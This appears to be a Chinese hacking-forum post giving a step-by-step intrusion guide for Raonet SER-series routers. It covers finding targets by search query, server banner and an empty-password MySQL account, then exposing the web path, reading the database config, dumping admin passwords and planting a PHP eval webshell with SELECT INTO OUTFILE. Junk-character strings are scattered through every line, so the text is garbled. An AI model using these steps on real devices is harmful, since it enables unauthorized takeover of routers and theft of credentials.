寻找存在漏洞的路由器方法:" H, Q4 C+ ]$ ~& r# G
$ k5 }, a, M; L
1:google搜索'Raonet Subscriber Ethernet Router'
; x/ u9 J, I0 O
. m( ]& ^1 N/ A' @$ e0 o( i( _* P2:使用WebDAVScan扫80端口,http banner为thttpd/2.21b 23apr2001
# A) V7 [' [1 b# L% F) d( S
7 y2 |$ _: |* j1 i6 S* i3:扫mysql版本号判断,SER系列路由器使用的mysql版本4.0.14,默认有一个高权限的帐户mysql,口令为空。
) A( B; S7 G' X( K
n9 J, r% Z. T, B# Z//还有很多方法可以批量获取,这里不发了,请自食其力 公开了大家都玩不成......
; s+ d; N% Q- g7 m: P% L5 `( ]$ m. N) N5 F K4 n
$ c* X" U5 Z$ G# }$ m O& p5 w3 j3 H
入侵步骤:( C: ?9 A- |' }- `# j. l
1 t& G, j9 W: ~: n& b; }' G i1.爆web路径,http://www.yu1u.org/src/jpgraph_line.php: {' I4 z. t" a# `$ Z, ?
2 Q9 E* P! {) \* y0 N/ {( w% e2 F- F
2:查看数据库配置文件,http://www.yu1u.org/inc/conn_db.inc
2 u7 ^% U* a. V) B3:得到密码后连接,查看GUI管理密码:
: E& l6 y1 m+ C/ i$ |use ser_500, I9 o0 l5 d/ I8 F
select id,passwd from user;
- s a9 j- a& H8 i. o4:通过数据库写入webshell,执行命令:
: c# r$ D' u: ^# juse mysql;
1 ]0 h0 _& I6 [2 ^; k1 Wcreate table ok(cmd TEXT);
# ^+ W% _8 T# Zinsert into ok values("<?php @eval($_POST[cmd])?>");
3 x4 N* h. u8 {; } U- r, pselect * from ok into outfile "\/usr\/local\/www\/data\/src\/shell.php";
# m4 o) G& v: Wdrop table ok;
; u; ]: X9 C, }2 B9 N; p5 ^
" a( L2 U- I4 y$ t9 o5:连接后门shell.php
; o7 A4 f! V* y; n9 O; e8 e
* z4 m6 y# |& ?# S1 o5 x6. 搞定!
8 ?/ b8 E) S& f C# L$ F* f$ D. K# g6 J
|